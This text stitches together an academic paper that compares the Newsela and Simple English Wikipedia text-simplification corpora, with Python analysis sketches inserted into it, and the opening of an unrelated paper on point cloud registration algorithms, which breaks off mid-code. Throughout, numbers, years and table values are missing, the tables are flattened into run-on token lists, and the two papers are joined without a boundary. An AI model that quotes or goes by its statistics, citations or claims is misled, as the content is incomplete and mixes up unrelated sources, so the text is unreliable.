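a minimal sketch of the lemma-based jaccard alignment described above (equation 1), using nltk's wordnet lemmatizer as the footnote suggests. the threshold default is a placeholder, since the actual cutoffs are elided in this copy, and the grouping of sentences across all versions of an article is omitted.

```python
# requires: pip install nltk ; then nltk.download('punkt') and nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize

_lemmatizer = WordNetLemmatizer()

def lemmas(sentence):
    """Set of lowercased WordNet lemmas for a sentence."""
    return {_lemmatizer.lemmatize(tok.lower()) for tok in word_tokenize(sentence)}

def jaccard(s1, s2):
    """Equation (1): lemma-overlap Jaccard similarity."""
    l1, l2 = lemmas(s1), lemmas(s2)
    if not l1 and not l2:
        return 1.0
    return len(l1 & l2) / len(l1 | l2)

def align_adjacent(simpler_sents, complex_sents, threshold=0.40):
    """Align each sentence of the simpler version to its best match in the
    immediately more complex version, keeping pairs at or above `threshold`.
    The paper's actual cutoffs are elided in this copy (it uses a lower one
    when sentence splitting is involved); 0.40 is only a placeholder."""
    alignments = []
    for s_simple in simpler_sents:
        scored = [(jaccard(s_simple, s_complex), s_complex) for s_complex in complex_sents]
        if not scored:
            continue
        score, best = max(scored)
        if score >= threshold:
            alignments.append((s_simple, best, score))
    return alignments
```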
table 5: this table shows the vocabulary changes between different levels of simplification in the newsela corpus (as a 5 × 5 matrix over the original and simp-1 through simp-4 versions). each cell shows the number of unique word types that appear in the corpus listed in the column but do not appear in the corpus listed in the row. we also list the average frequency of those vocabulary items. for example, in the cell marked *, the simp- version contains unique words that do not appear in the original version. by comparing the cells marked **, we see about half of the words ( , out of , ) in the original version are not in the simp- version. most of the vocabulary that is removed consists of low-frequency words (with an average frequency of . in the original).

vocabulary statistics

table 4 shows the basic statistics of the newsela corpus and the pwkp corpus. they are clearly different. compared to the newsela data, the wikipedia corpus contains remarkably longer (more complex) words and the difference of sentence length before and after simplification is much smaller. (we use the penn treebank tokenizer in the moses package: https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl)

tables 2 and 5 show the vocabulary statistics and the vocabulary difference matrix of the pwkp and newsela corpus. while the vocabulary size of the pwkp corpus drops only % from , unique words to , , the vocabulary size of the newsela corpus is reduced dramatically by . % from , to , words at its most simplified level (simp- ). moreover, in the newsela data, only several hundred words that occur in the simpler version do not occur in the more complex version. the words introduced are often abbreviations ("national hurricane center" → "nhc"), less formal words ("unscrupulous" → "crooked") and shortened words ("chimpanzee" → "chimp"). this implies a more complete and precise degree of simplification in the newsela than the pwkp dataset.

log-odds-ratio analysis of words

in this section, we visualize the differences in the topics and degree of simplification between the simple wikipedia and the newsela corpus. to do this, we employ the log-odds-ratio informative dirichlet prior method of monroe et al. ( ) to find words and punctuation marks that are statistically overrepresented in the simplified text compared to the original text. the method measures each token by the z-score of its log-odds-ratio as:

\frac{\delta_t^{(i-j)}}{\sqrt{\sigma^2\left(\delta_t^{(i-j)}\right)}}    (2)

it uses a background corpus when calculating the log-odds-ratio \delta_t for token t, and controls for its variance \sigma^2. therefore it is capable of detecting differences even in very frequent tokens. other methods used to discover word associations, such as mutual information, log likelihood ratio, t-test and chi-square, often have problems with frequent words (jurafsky et al., ). we choose the monroe et al. ( ) method because many function words and punctuations are very frequent and play important roles in text simplification. the log-odds-ratio \delta_t^{(i-j)} for token t estimates the difference of the frequency of token t between two text sets i and j as:

\delta_t^{(i-j)} = \log\left(\frac{y_t^i + \alpha_t}{n^i + \alpha_0 - (y_t^i + \alpha_t)}\right) - \log\left(\frac{y_t^j + \alpha_t}{n^j + \alpha_0 - (y_t^j + \alpha_t)}\right)    (3)

where n^i is the size of corpus i, n^j is the size of corpus j, y_t^i is the count of token t in corpus i, y_t^j is the count of token t in corpus j, \alpha_0 is the size of the background corpus, and \alpha_t is the count of token t in the background corpus. we use the combination of both simple and complex sides in the corpus as the background. the variance of the log-odds-ratio is estimated by:

\sigma^2\left(\delta_t^{(i-j)}\right) \approx \frac{1}{y_t^i + \alpha_t} + \frac{1}{y_t^j + \alpha_t}    (4)
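equations (2)-(4) can be computed directly from token counts. the sketch below is one straightforward reading of the method, using the combined simple and complex sides as the background prior as described above; it is an illustration, not the authors' code.

```python
import math
from collections import Counter

def log_odds_z_scores(counts_i, counts_j, background=None):
    """z-scored log-odds-ratio with an informative Dirichlet prior
    (Monroe et al.), following equations (2)-(4) above.
    counts_i, counts_j: Counter mapping token -> count for the two text sets.
    background: prior counts; defaults to the combination of both sides,
    as the section above does."""
    if background is None:
        background = counts_i + counts_j
    n_i, n_j = sum(counts_i.values()), sum(counts_j.values())
    a0 = sum(background.values())
    z = {}
    for t in set(counts_i) | set(counts_j):
        a_t = background[t]
        y_i, y_j = counts_i[t], counts_j[t]
        delta = (math.log((y_i + a_t) / (n_i + a0 - y_i - a_t))
                 - math.log((y_j + a_t) / (n_j + a0 - y_j - a_t)))
        variance = 1.0 / (y_i + a_t) + 1.0 / (y_j + a_t)
        z[t] = delta / math.sqrt(variance)
    return z

# tokens with the largest z-scores are most associated with text set i
# (e.g. the complex side), the most negative with text set j:
complex_side = Counter("the committee which was established in".split())
simple_side = Counter("the group that was set up in".split())
scores = log_odds_z_scores(complex_side, simple_side)
print(sorted(scores, key=scores.get, reverse=True)[:3])
```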
table 6 lists the top words and punctuation marks that are the most strongly associated with the complex text. both corpora significantly reduce function words and punctuation. the content words show the differences of the topics and subject matters between the two corpora. table 7 lists the top words that are the most strongly associated with the simplified text. the two corpora are more agreeable on what the simple words are than what complex words need to be simplified.

table 8 shows the frequency and odds ratio of example words from the top complex words. the odds ratio of token t between two text sets i and j is defined as:

r_t^{(i-j)} = \frac{y_t^i / y_t^j}{n^i / n^j}    (5)

it reflects the difference of topics and degree of simplification between the wikipedia and the newsela data.

table 6: top tokens associated with the complex text, computed using the monroe et al. ( ) method (columns: newsela original and wikipedia (pwkp) normal). bold words in the original table are shared by the complex version of newsela and the complex version of wikipedia.
punctuation: , " – ; ' ( ) , ; –
determiner/pronoun: which we an such who i that a whose which whom
contraction: 's
conjunction: and while although and although while
prepositions: of as including with according by among in despite as with following to of within upon including
adverb: currently approximately initially primarily subsequently typically thus formerly
noun: percent director data research decades industry policy development state decade status university residents film commune footballer pays-de-la-loire walloon links midfielder defender goalkeeper
adjective: federal potential recent executive economic northern northwestern southwestern external due numerous undated various prominent
verb: advocates based access referred derived established situated considered consists regarded having

table 7: top tokens associated with the simplified text (columns: newsela simp- and wikipedia (pwkp) simple).
punctuation: . .
determiner/pronoun: they it he she them lot it he they lot this she
conjunction: because
adverb: also not there too about very now then how about very there
noun: people money scientists government things countries rules problems group movie people northwest north region loire player websites southwest movies football things
adjective: many important big new used big biggest famous different important many
verb: is are can will make get were wants was called help hurt be made like stop want works do live found is made called started pays said was got are like get can means says has went comes make put used

table 8: frequency and odds ratio of example words from table 6 (rows: which, where, advocates, approximately, thus; columns: newsela original, simp- , odds-ratio and pwkp normal, simple, odds-ratio). these complex words are reduced at a much greater rate in the simplified newsela than they are in the simple english wikipedia. a smaller odds ratio indicates greater reduction.

the high proportion of clause-related function words, such as "which" and "where",
newsela - original wikipedia (pwkp) - normal newsela - simp wikipedia (pwkp) - simple pp(of) → in np pp(as) → in np s(is) → np vp .
np(it) → prp whnp(which) → wdt pp(of) → in np np(they) → prp s(is) → np vp . sbar(which) → whnp s vp(born) → vbn np np pp s(are) → np vp . s(was) → np vp . pp(to) → to np whnp(which) → wdt s(was) → np vp . np(he) → prp np(percent) → cd nn pp(to) → to np np(people) → nns np(they) → prp whnp(that) → wdt np(municipality) → dt jj nn vp(is) → vbz np np(player) → dt jj jj nn nn sbar(that) → whnp s frag(-) → adjp : np(he) → prp s(are) → np vp . pp(with) → in np frag(-) → frag : frag s(were) → np vp . np(movie) → dt nn pp(according) → vbg pp np()) → nnp nnp nnp np(it) → prp s(has) → np vp . np(percent) → np pp np(film) → dt nn s(can) → np vp . vp(called) → vbn np np(we) → prp np(footballer) → dt jj jj nn s(will) → np vp . vp(is) → vbz pp pp(including) → vbg np np(footballer) → np sbar advp(also) → rb vp(made) → vbn pp sbar(who) → whnp s advp(currently) → rb s(have) → np vp . vp(said) → vbd sbar sbar(as) → in s vp(born) → vbn np np s(could) → np vp . vp(has) → vbz np whnp(who) → wp advp(initially) → rb s(said) → np vp . vp(is) → vbz np np(i) → fw pp(with) → in np s(has) → np vp . np(this) → dt pp(as) → in np whpp(of) → in whnp np(people) → jj nns vp(was) → vbd np np(director) → np pp sbar(although) → in s np(money) → nn np(people) → nns pp(by) → in np advp(primarily) → rb np(government) → dt nn np(lot) → dt nn s(has) → vp s(links) → np vp . s(do) → np vp . np(season) → nn cd pp(in) → in np vp(links) → vbz np np(scientists) → nns s(can) → np vp . sbar(while) → in s pp(following) → vbg np vp(called) → vbn np vp(is) → vbz vp pp(as) → jj in np advp(subsequently) → rb s(had) → np vp . sbar(because) → in s prn(–) → : np : sbar(which) → whnp s s(says) → np vp . vp(are) → vbp np s(’s) → np vp sbar(while) → in s s(would) → np vp . np(player) → dt jj nn nn s(said) → ” s , ” np vp . s(plays) → advp vp s(say) → np vp . np(there) → ex pp(at) → in np pp(within) → in np s(works) → np vp . np(lot) → np pp pp(among) → in np pp(by) → in np s(may) → np vp . np(websites) → jj nns sbar(although) → in s sbar(of) → whnp s s(did) → np vp . pp(like) → in np vp(said) → vbd np s(is) → s : s . s(think) → np vp . s(started) → np vp . table : top syntax patterns associated with the complex text (left) and simplified text (right). bold patterns are the top patterns shared by newsela and wikipedia. that are retained in simple wikipedia indicates the incompleteness of simplification in the sim- ple wikipedia. the dramatic frequency decrease of words like “which” and “advocates” in newsela shows the consistent quality from professional sim- plifications. wikipedia has good coverage on certain words, such as “approximately”, because of its large volume. . log-odds-ratio analysis of syntax patterns we can also reveal the syntax patterns that are most strongly associated with simple text versus com- plex text using the log-odds-ratio technique. ta- ble shows syntax patterns that represent “parent node (head word) → children node(s)" structures from a constituency parse tree. to extract theses patterns we parsed our corpus with the stanford parser (klein and manning, ) and applied its built-in head word identifier from collins ( ). both the newsela and wikipedia corpora exhibit syntactic differences that are intuitive and interest- ing. however, as with word frequency (table ), complex syntactic patterns are retained more often in wikipedia’s simplifications than in newsela’s. 
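the "parent node (head word) → children node(s)" patterns in table 9 can be read off a constituency parse once a head word is chosen for each node. the sketch below assumes parses are already available as nltk tree objects and uses a deliberately naive head rule (first leaf) in place of the collins head finder that the authors used, so its heads will differ from theirs.

```python
from nltk import Tree

def naive_head(subtree):
    """Placeholder head rule: take the subtree's first leaf. The paper uses
    the Collins head-finding rules built into the Stanford parser instead."""
    return subtree.leaves()[0].lower()

def lexicalized_productions(tree, head_fn=naive_head):
    """Yield strings like 'NP(he) -> PRP' for each internal node of a
    constituency parse: the parent label with its head word, followed by
    the sequence of child labels."""
    for sub in tree.subtrees():
        if isinstance(sub[0], Tree):            # skip preterminals (POS -> word)
            children = " ".join(child.label() for child in sub)
            yield f"{sub.label()}({head_fn(sub)}) -> {children}"

parse = Tree.fromstring("(S (NP (PRP he)) (VP (VBZ is) (NP (DT a) (NN player))) (. .))")
for pattern in lexicalized_productions(parse):
    print(pattern)
# S(he) -> NP VP .
# NP(he) -> PRP
# VP(is) -> VBZ NP
# NP(a) -> DT NN
```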
in order to show interesting syntax patterns in the wikipedia parallel data for table , we first had to discard sentences in pwkp that contain both "is a commune" and "france". as the word-level analysis in tables and hints, there is an exceeding number of sentences about communes in france in the pwkp corpus, such as the sentence pair below: [norm] la couture is a commune in the pas-de-calais department in the nord-pas-de-calais region of france . [simp] la couture, pas-de-calais is a commune. it is found in the region nord-pas-de-calais in the pas-de-calais department in the north of france. this is a template sentence from a stub geo- graphic article and its deterministic simplification. the influence of this template sentence is more over- whelming in the syntax-level analysis than in the word-level analysis —- about / of the top syn- tax patterns would be related to these sentence pairs if they were not discarded. . document-level compression there are few publicly accessible document-level parallel simplification corpora (barzilay and lap- ata, ). the newsela corpus will enable more research on document-level simplification, such as anaphora choice (siddharthan and copestake, ), content selection (woodsend and lapata, b), and discourse relation preservation (sid- dharthan, ). simple wikipedia is rarely used to study document-level simplification. woodsend and la- pata ( b) developed a model that simplifies wikipedia articles while selecting their most impor- tant content. however, they could only use simple wikipedia in very limited ways. they noted that simple wikipedia is “less mature” with many arti- cles that are just “stubs, comprising a single para- graph of just one or two sentences”. we quantify their observation in figure , plotting the document- level compression ratio of simple vs. normal wikipedia articles. the compression ratio is the ratio of the number of characters between each simple-complex article pair. in the plot, we use all thousand article pairs from the simple-normal wikipedia collected by kauchak ( ) in may . the overall compression ratio is skewed to- wards almost . for comparison, we also plot the ratio between the simplest version (simp- ) and the original version (original) of the news articles in the newsela corpus. the newsela corpus has a much more reasonable compression ratio and is therefore likely to be more suitable for studying document- level simplification. . analysis of discourse connectives although discourse is known to affect readability, the relation between discourse and text simplifica- tion is still under-studied with the use of statistical methods (williams et al., ; siddharthan, ; siddharthan and katsos, ). text simplification often involves splitting one sentence into multiple sentences, which is likely to require discourse-level changes such as introducing explicit rhetorical rela- tions. however, previous research that uses simple- normal wikipedia largely focuses on sentence-level transformation, without taking large discourse struc- ture into account. figure : a radar chart that visualizes the odds ra- tio (radius axis) of discourse connectives in sim- ple side vs. complex side. an odds ratio larger than indicates the word is more likely to occur in the simplified text than in the complex text, and vice versa. simple cue words (in the shaded re- gion), except “hence”, are more likely to be added during newsela’s simplification process than in wikipedia’s. 
complex conjunction connectives (in the unshaded region) are more likely to be retained in wikipedia’s simplifications than in newsela’s. to preserve the rhetorical structure, siddharthan ( , ) proposed to introduce cue words when simplifying various conjoined clauses. we perform an analysis on discourse connectives that are rel- evant to readability as suggested by siddharthan ( ). figure presents the odds ratios of sim- ple cue words and complex conjunction connectives. the odds radios are computed for newsela between the original and simp- versions, and for wikipedia between normal and simple documents collected by kauchak ( ). it suggests that newsela ex- hibits a more complete degree of simplification than wikipedia, and that it may be able to enable more computational studies of the role of discourse in text simplification in the future. . . . . . . . . . . . . newsela compression ratio d e n si ty wikipedia compression ratio d e n si ty . . . . . . . . figure : distribution of document-level compression ratio, displayed as a histogram smoothed by kernel density estimation. the newsela corpus is more normally distributed, suggesting more consistent quality. . newsela’s quality is better than wikipedia overall, we have shown that the professional sim- plification of newsela is more rigorous and more consistent than simple english wikipedia. the lan- guage and content also differ between the encyclo- pedia and news domains. they are not exchangeable in developing nor in evaluating simplification sys- tems. in the next section, we will review the evalua- tion methodology used in recent research, discuss its shortcomings and propose alternative evaluations. evaluation of simplification systems with the popularity of parallel wikipedia data in simplification research, most state-of-the-art systems evaluate on simplifying sentences from wikipedia. all simplification systems published in the acl, naacl, eacl, coling and emnlp main conferences since zhu’s work compared solely on the same test set that consists of only sentences from wikipedia, except one paper that additionally experimented with short news summaries. the most widely practiced evaluation methodology is to have human judges rate on gram- maticality (or fluency), simplicity, and adequacy (or meaning preservation) on a -point likert scale. such evaluation is insufficient to measure ) the practical value of a system to a specific target reader population and ) the performance of individual simplification components: sentence splitting, dele- tion and paraphrasing. although the inadequacy of text simplification evaluations has been discussed before (siddharthan, ), we focus on these two common deficiencies and suggest two future direc- tions. . targeting specific audiences simplification has many subtleties, since what con- stitutes simplification for one type of user may not be appropriate for another. many researchers have studied simplification in the context of different au- diences. however, most recent automatic simplifica- tion systems are developed and evaluated with little consideration of target reader population. there is one attempt by angrosh et al. ( ) who evaluate their system by asking non-native speakers compre- hension questions. they conducted an english vo- cabulary size test to categorize the users into differ- ent levels of language skills. the newsela corpus allows us to target children at different grade levels. 
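one concrete way to operationalize "targeting a grade level" is a standard readability formula. the sketch below computes the flesch-kincaid grade level (kincaid et al.) with a crude syllable heuristic; it is meant only as a rough, automatic check of whether system output lands near a target grade, not as a replacement for the human evaluation discussed here.

```python
import re

def count_syllables(word):
    """Crude vowel-group heuristic; real implementations typically use a
    pronouncing dictionary such as CMUdict."""
    groups = re.findall(r"[aeiouy]+", word.lower())
    return max(1, len(groups))

def flesch_kincaid_grade(sentences):
    """Flesch-Kincaid grade level:
    0.39 * (words per sentence) + 11.8 * (syllables per word) - 15.59."""
    words = [w for s in sentences for w in re.findall(r"[a-zA-Z]+", s)]
    if not sentences or not words:
        return 0.0
    syllables = sum(count_syllables(w) for w in words)
    return 0.39 * len(words) / len(sentences) + 11.8 * syllables / len(words) - 15.59

original = ["slightly more fourth-graders nationwide are reading proficiently compared "
            "with a decade ago, but only a third of them are now reading well."]
simplified = ["fourth-graders are better readers than years ago.",
              "but few of them read well."]
print(flesch_kincaid_grade(original), flesch_kincaid_grade(simplified))
```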
from the application point of view, making knowledge accessible to all children is an important yet challenging part of education (scar- ton et al., ; moraes et al., ). from the tech- nical point of view, reading grade level is a clearly defined objective for both simplification systems and human annotators. once there is a well-defined ob- jective, with constraints such as vocabulary size and sentence length, it is easier to fairly compare differ- ent systems. newsela provides human simplification at different grade levels and reading comprehension quizzes alongside each article. in addition, readability is widely studied and can be automatically estimated (kincaid et al., ; pitler and nenkova, ; petersen and ostendorf, ). although existing readability metrics assume text is well-formed, they can potentially be used in combination with text quality metrics (post, ; louis and nenkova, ) to evaluate simplifica- tions. they can also be used to aid humans in the creation of reference simplifications. . evaluating sub-tasks separately it is widely accepted that sentence simplification in- volves three different elements: splitting, deletion and paraphrasing (feng, ; narayan and gar- dent, ). splitting breaks a long sentence into a few short sentences to achieve better readability. deletion reduces the complexity by removing unim- portant parts of a sentence. paraphrasing rewrites text into a simpler version via reordering, substitu- tion and occasionally expansion. most state-of-the-art systems consist of all or a subset of these three components. however, the pop- ular human evaluation criteria (grammaticality, sim- plicity and adequacy) do not explain which compo- nents in a system are good or bad. more importantly, deletion may be unfairly penalized since shorter out- put tends to result in lower adequacy judgements (napoles et al., ). we therefore advocate for a more informative evaluation that separates out each sub-task. we be- lieve this will lead to more easily quantifiable met- rics and possibly the development of automatic met- rics. for example, early work shows potential use of precision and recall to evaluate splitting (sid- dharthan, ; gasperin et al., ) and deletion (riezler et al., ; filippova and strube, ). several studies also have investigated various met- rics for evaluating sentence paraphrasing (callison- burch et al., ; chen and dolan, ; ganitke- vitch et al., ; xu et al., , ; weese et al., ). summary and recommendations in this paper, we presented the first systematic anal- ysis of the quality of simple wikipedia as a simpli- fication data resource. we conducted a qualitative manual examination and several statistical analyses (including vocabulary change matrices, compres- sion ratio histograms, log-odds-ratio calculations, etc.). we introduced a new, high-quality corpus of professionally simplified news articles, newsela, as an alternative resource, that allowed us to demon- strate simple wikipedia’s inadequacies in compar- ison. we further discussed problems with current simplification evaluation methodology and proposed potential improvements. our goal for this opinion paper is to stimulate progress in text simplification research. simple en- glish wikipedia played a vital role in inspiring sim- plification approaches based on statistical machine translation. however, it has so many drawbacks that we recommend the community to drop it as the standard benchmark set for simplification. 
other re- sources like the newsela corpus are superior, since they provide a more consistent level of quality, tar- get a particular audience, and approach the size of parallel simple-normal english wikipedia. we be- lieve that simplification is an important area of re- search that has the potential for broader impact be- yond nlp research. but we must first adopt appro- priate data sets and research methodologies. researchers can request the newsela data fol- lowing the instructions at: https://newsela. com/data/ acknowledgments the authors would like to thank dan cogan-drew, jennifer coogan, and kieran sobel from newsela for creating their data and generously sharing it with us. we also thank action editor rada mihalcea and three anonymous reviewers for their thoughtful comments, and ani nenkova, alan ritter and max- ine eskenazi for valuable discussions. this material is based on research sponsored by the nsf under grant iis- . the views and conclusions contained in this publication are those of the authors and should not be interpreted as repre- senting official policies or endorsements of the nsf or the u.s. government. https://newsela.com/data/ https://newsela.com/data/ references allen, d. ( ). a study of the role of relative clauses in the simplification of news texts for learners of english. system, ( ): – . angrosh, m., nomoto, t., and siddharthan, a. ( ). lexico-syntactic text simplification and compression with typed dependencies. in pro- ceedings of the th conference of the euro- pean chapter of the association for computa- tional linguistics (eacl). bach, n., gao, q., vogel, s., and waibel, a. ( ). tris: a statistical sentence simplifier with log- linear models and margin-based discriminative training. in proceedings of th international joint conference on natural language process- ing (ijcnlp). barzilay, r. and lapata, m. ( ). modeling local coherence: an entity-based approach. computa- tional linguistics, ( ): – . callison-burch, c., cohn, t., and lapata, m. ( ). parametric: an automatic evaluation metric for paraphrasing. in proceedings of the nd international conference on computational linguistics (coling). canning, y., tait, j., archibald, j., and crawley, r. ( ). cohesive generation of syntactically simplified newspaper text. in proceedings of the third international workshop on text, speech and dialogue (tsd). carroll, j., minnen, g., pearce, d., canning, y., de- vlin, s., and tait, j. ( ). simplifying text for language-impaired readers. in proceedings of the th conference of the th european conference for computational linguistics (eacl). chandrasekar, r., doran, c., and srinivas, b. ( ). motivations and methods for text simpli- fication. in proceedings of the th conference on computational linguistics (coling). chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). chen, h.-b., huang, h.-h., chen, h.-h., and tan, c.-t. ( ). a simplification-translation- restoration framework for cross-domain smt ap- plications. in proceedings of the th interna- tional conference on computational linguistics (coling). collins, m. ( ). head-driven statistical models for natural language parsing. computational lin- guistics, ( ): – . coster, w. and kauchak, d. ( ). simple english wikipedia: a new text simplification task. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics: human language technologies (acl-hlt). 
international journal of advanced network, monitoring and controls

comparison of several different registration algorithms

liu lulu, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
liu baolong, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: liu.bao.long@hotmail.com

abstract—the common point cloud registration algorithms are usually divided into initial registration and precise registration. in this paper, the sac-ia algorithm, which is commonly used in pcl, is selected for initial registration, and the traditional icp algorithm is used for precise registration. three different feature descriptors (3d shape context, point feature histograms, and fast point feature histograms) are used to realize the sac-ia algorithm and the icp precise registration algorithm.
during the implementation of the algorithms, the registration time and registration error of the point clouds are calculated; according to the experimental results, the registration time and registration error of the sac-ia algorithm and the icp algorithm based on three different descriptors are compared. the results show that the registration algorithm based on 3d shape context has high accuracy, but its registration time is too long, which makes it unsuitable for large point cloud data; the registration algorithm based on fast point feature histograms has a short registration time and a good registration effect.

keywords—point cloud registration; sac-ia algorithm; icp algorithm; registration time; registration error

i. introduction

with the rapid development of computer-aided design and computer-aided manufacturing technology, reverse engineering technology, which generates a digital model from a physical model, has received wide attention. in reverse engineering, computer vision, 3d image processing, and other fields, it is difficult to obtain all the data of a measured object in all directions at one time because of the limitations of the data acquisition equipment, the shape of the 3d object itself, the external environment, and so on. usually, the point cloud data of three-dimensional objects are acquired from different angles by the data acquisition equipment several times, and a point cloud registration algorithm is used to splice the point clouds of the various perspectives into complete point cloud data. point cloud registration is an important and difficult part of reverse engineering. the registration quality between point clouds directly affects the accuracy of the whole 3d model, so point cloud registration has become a research hotspot in the field of point cloud processing. point cloud registration includes manual registration, instrument-dependent registration, and automatic registration; automatic point cloud registration algorithms are usually used. automatic registration of point clouds calculates the misalignment between two groups of point clouds by an algorithm, so as to achieve the purpose of automatic registration. from the process of registration, it can be divided into two schemes: initial registration and accurate registration. the initial registration provides the initial transformation matrix for the accurate registration; the accurate registration is a secondary registration based on the initial transformation matrix, which can obtain a more accurate solution and improve the final registration accuracy. common registration algorithms include the icp algorithm[ ], the ndt algorithm[ ], the sac-ia algorithm, etc. among them, accurate registration has basically been fixed to the icp algorithm and its various improved versions[ ]~[ ]. the icp algorithm has high accuracy, but it has strict requirements on the initial matrix: if the result of the initial registration is not ideal, it will seriously affect the performance of the algorithm, so that the iteration cannot converge to the globally optimal registration result and may even fall into a local optimum. therefore, the initial registration algorithm is also very important in the registration process. in this paper, the sac-ia algorithm and the icp accurate registration algorithm based on three different descriptors are selected to perform initial registration and accurate registration on two groups of point cloud data collected from different angles.
finally, the experimental results are compared to evaluate the advantages and disadvantages of the different descriptors in the initial registration algorithm and the accurate registration algorithm, and the descriptors most suitable for the sac-ia algorithm and the icp algorithm are selected.

ii. point cloud registration

the principle of a point cloud registration algorithm is to match the source point cloud q to the reference system of the target point cloud p through a transformation matrix, that is, p = r * q + t, where r is the rotation transformation matrix and t is the translation transformation matrix. the essence of a point cloud registration algorithm is the process of solving r and t. the specific implementation steps are as follows:

step 1. extract key points from the two point cloud data sets according to the same key point selection criteria;
step 2. calculate the feature descriptors of all the selected key points;
step 3. combining the coordinate positions of the feature descriptors in the two point cloud data sets, estimate the correspondence between them based on the similarity of features and positions, and preliminarily estimate the corresponding point pairs;
step 4. considering the noise in the point cloud data, remove the wrong corresponding point pairs that would affect the registration;
step 5. use the remaining correct correspondences to estimate the rigid body transformation and complete the registration.

iii. sample consensus initial alignment

the initial registration prepares for the subsequent accurate registration. the initial registration is carried out on two point clouds, and the initial values of the translation matrix and rotation matrix are calculated; the point cloud data to be registered are then transformed into a unified coordinate system, providing a better initial position for accurate registration. for the rough estimation of the initial transformation matrix, greedy initial registration methods require a lot of work: they use the rotation-invariant features of the point cloud data, the computational complexity is high, and it is necessary to check all possible correspondences of the feature descriptors; in addition, a greedy algorithm may fall into a local optimum. therefore, for the initial registration of point clouds, the sample consensus method is usually chosen, which tries to maintain the geometric relations of the same correspondences rather than exhaustively evaluating all combinations of the finite correspondences. the sample consensus initial alignment (sac-ia for short) algorithm takes a large number of samples from the candidate correspondences and quickly finds a good transformation by examining many of them, until the best rotation and translation errors are obtained and stored. in the initial registration of a point cloud, 3d point cloud feature description and extraction is the most basic step and also the most critical part of the sample consensus initial registration algorithm, which is based on local feature description. this section realizes the sample consensus initial registration algorithm based on three descriptors: 3d shape context descriptors, point feature histogram descriptors, and fast point feature histogram descriptors; the optimal results of the initial registration algorithm are obtained by experiments.
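as a concrete illustration of the relation p = r * q + t and of step 5 above, the following is a minimal numpy sketch (not the authors' pcl implementation; all names are illustrative) of estimating r and t from a set of corresponding point pairs using the standard svd-based (kabsch) solution, and of applying the recovered transform to a source cloud:

```python
import numpy as np

def estimate_rigid_transform(src, dst):
    """Estimate R, t such that dst ~= R @ src + t from corresponding
    point pairs (both arrays are N x 3), using the SVD-based solution."""
    src_centroid = src.mean(axis=0)
    dst_centroid = dst.mean(axis=0)
    # cross-covariance of the centered correspondences
    H = (src - src_centroid).T @ (dst - dst_centroid)
    U, _, Vt = np.linalg.svd(H)
    R = Vt.T @ U.T
    # reflection correction so that R is a proper rotation (det(R) = +1)
    if np.linalg.det(R) < 0:
        Vt[-1, :] *= -1
        R = Vt.T @ U.T
    t = dst_centroid - R @ src_centroid
    return R, t

def apply_transform(points, R, t):
    """Apply p = R * q + t to every point q in an N x 3 array."""
    return points @ R.T + t

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    q = rng.random((100, 3))                       # toy "source" cloud
    true_R, _ = np.linalg.qr(rng.standard_normal((3, 3)))
    if np.linalg.det(true_R) < 0:                  # ensure a proper rotation
        true_R[:, 0] *= -1
    true_t = np.array([0.5, -0.2, 0.1])
    p = apply_transform(q, true_R, true_t)         # toy "target" cloud
    R, t = estimate_rigid_transform(q, p)
    print(np.allclose(R, true_R), np.allclose(t, true_t))
```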
a. 3d shape context

3d shape context (3dsc for short) uses a vector to describe the shape features of a specified point and its neighborhood on the surface, and establishes the correspondence between points on different surfaces by matching the values of this vector, which serves as the descriptor of the specified point. 3dsc descriptors are simple in structure, strongly discriminative, and insensitive to noise. the construction method is as follows: in a spherical support domain centered on the designated point p, the grid is divided along three coordinate directions: radial distance, azimuth angle, and pitch angle; the number of points falling into each grid cell is counted, and the vector v is constructed. each element of v corresponds to one grid cell in the support domain, and its value is the number of points in the corresponding cell. the vector v is the descriptor of point p[ ]. the 3dsc grid division is shown in fig. .

figure . 3dsc mesh generation

b. point feature histograms

point feature histograms (pfh for short) parameterize the spatial differences between a query point and its neighboring points and form a multi-dimensional histogram to describe the geometric properties of the point's k-neighborhood. the high-dimensional histogram space provides a measurable information space for feature representation, is invariant to the pose of the corresponding surface of the point cloud, and is robust under different sampling densities and neighborhood noise levels. the pfh representation is based on the relationships between a point, its k neighbors, and their estimated normals; it considers all interactions between normal directions and tries to capture the variation of the sampled surface as well as possible in order to describe its geometric characteristics. therefore, the resulting feature hyperspace depends on the quality of the surface normal estimation at each point. fig. shows the influence area of the pfh calculation for a query point, which is marked in red and placed at the center of the ball. the radius is r, and all k-neighbors of the query point (all points whose distance from it is less than the radius r) are fully interconnected in a network. the final pfh descriptor is obtained as a histogram by computing the relationships between every pair of points in this neighborhood.

figure . influence range of the pfh calculation at a query point

c. fast point feature histograms

fast point feature histograms[ ] (fpfh for short) is a feature descriptor based on the angles between the normals of points and their neighbors and the angles between the lines connecting the points. it is an improvement of pfh that retains the main geometric characteristics of the point-to-point description in pfh while reducing the computational complexity from o(n·k²) to o(n·k), where n is the number of points in the point cloud data and k is the number of neighbors considered when calculating the feature vector of each point. for a query point, fpfh first uses the pairings between the point and its neighborhood points (represented by the red lines in fig. ) to estimate its simplified point feature histogram (spfh) value. compared with the standard pfh calculation, fpfh has fewer inter-neighborhood interconnections. every point in the point cloud data set needs its spfh to be calculated; the fpfh value of a point is then obtained by weighting the spfh values of its adjacent points together with the spfh value of the point itself. for the additional connection pairs included in the fpfh calculation, the black lines in fig. indicate that some important point pairs (points directly connected to the query point) are counted twice (the thick lines in fig. ), while the other connected point pairs are represented by thin black lines.

figure . fpfh calculation neighborhood influence range of a query point
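the pair relationships that pfh and spfh bin into histograms can be illustrated with a small numpy sketch. this is not the pcl implementation; it only computes, for one pair of points with estimated unit normals, the three angular features of one common darboux-frame construction (sign conventions vary between write-ups), and accumulates them into a toy spfh-style histogram. all function names, bin counts, and ranges are illustrative.

```python
import numpy as np

def pfh_pair_features(p_s, n_s, p_t, n_t):
    """Angular pair features (alpha, phi, theta) between a source point
    p_s with unit normal n_s and a target point p_t with unit normal n_t,
    using a Darboux-style local frame (one of several equivalent conventions)."""
    d_vec = p_t - p_s
    d = np.linalg.norm(d_vec)
    u = n_s                         # first frame axis: source normal
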